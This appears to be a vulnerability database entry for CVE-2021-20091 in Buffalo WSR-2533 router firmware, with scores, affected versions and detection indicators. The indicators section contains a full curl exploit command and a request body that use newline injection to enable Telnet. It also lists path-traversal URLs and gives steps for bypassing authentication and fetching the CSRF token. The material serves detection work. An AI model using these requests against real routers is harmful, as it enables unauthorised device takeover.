cbcvebase.
CVE-2021-20091
published 2021-04-29

CVE-2021-20091: The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly sanitize user input. An…

PriorityP179high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
8.69%
94.5th percentile
The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution.

Affected

2 ranges
VendorProductVersion rangeFixed in
buffalowsr-2533dhp3-bk_firmware<= 1.24
buffalowsr-2533dhpl2-bk_firmware<= 1.02

Detection & IOCsextracted from sources · hover to see the quote

urlGET /images/..%2finfo.html HTTP/1.1
urlPOST /images/..%2fapply_abstract.cgi HTTP/1.1
path/images/..%2findex.htm
path/js/..%2findex.htm
path/css/..%2findex.htm
path/images/..%2fcgi/cgi_i_filter.js
commandcurl --include -X POST http:///apply_abstract.cgi -H "Referer: http:///ping.html" --data "action=start_ping&httoken=&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=%0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4"
commandaction=start_ping&httoken={{trimprefix(base64_decode(httoken), base64_decode("R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"))}}&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=127.0.0.1%0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4
otherARC_SYS_TelnetdEnable=1
cookielang=8; url=ping.html; mobile=false;
other/Success.htm
  • Path traversal bypass uses URL-encoded `..%2f` sequences prepended with whitelisted directory names (images/, js/, css/) to bypass authentication checks on the Buffalo router web interface.
  • Exploitation of CVE-2021-20091 involves a POST to `/apply_abstract.cgi` (reached via path traversal) with a newline-injected `ARC_ping_ipaddress` parameter to enable Telnet (`ARC_SYS_TelnetdEnable=1`). Detect POST requests to paths matching `*..%2fapply_abstract.cgi` with body containing `ARC_SYS_TelnetdEnable`.
  • Successful exploitation results in an HTTP 302 redirect to `/Success.htm`. Monitor for 302 responses to POST requests targeting `apply_abstract.cgi` via path traversal.
  • Reconnaissance/check requests for CVE-2021-20091 access `/images/..%2finfo.html` with a Referer header pointing to `/info.html`. Detect GET requests with `..%2f` traversal in the path targeting Buffalo router web interfaces.
  • The httoken CSRF token is extracted from a base64-encoded value in the page source matching the regex `base64\,(.*?)" border=`. Attackers obtain this token from `/loginerror.html` without authentication via the path traversal bypass.
  • GreyNoise tracks active exploitation under tags 'Buffalo Router RCE Check' (unknown intent) and 'Buffalo Router RCE Attempt' (malicious intent) for CVE-2021-20091.
  • ·CVE-2021-20091 and CVE-2021-20092 have only been confirmed on Buffalo WSR-2533 models, while the related path traversal auth bypass (CVE-2021-20090) affects a much broader set of Arcadyan-based devices.
  • ·Exploitation requires a valid httoken CSRF token. However, the token can be obtained unauthenticated by accessing `/loginerror.html` via the path traversal bypass, effectively making the attack unauthenticated in practice.
  • ·Certain CGI files require both a valid httoken and a valid Referer header. The Referer must NOT contain the `..%2f` traversal string, requiring proxy match/replace to function correctly during exploitation.

CVSS provenance

nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:P
vulncheck8.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.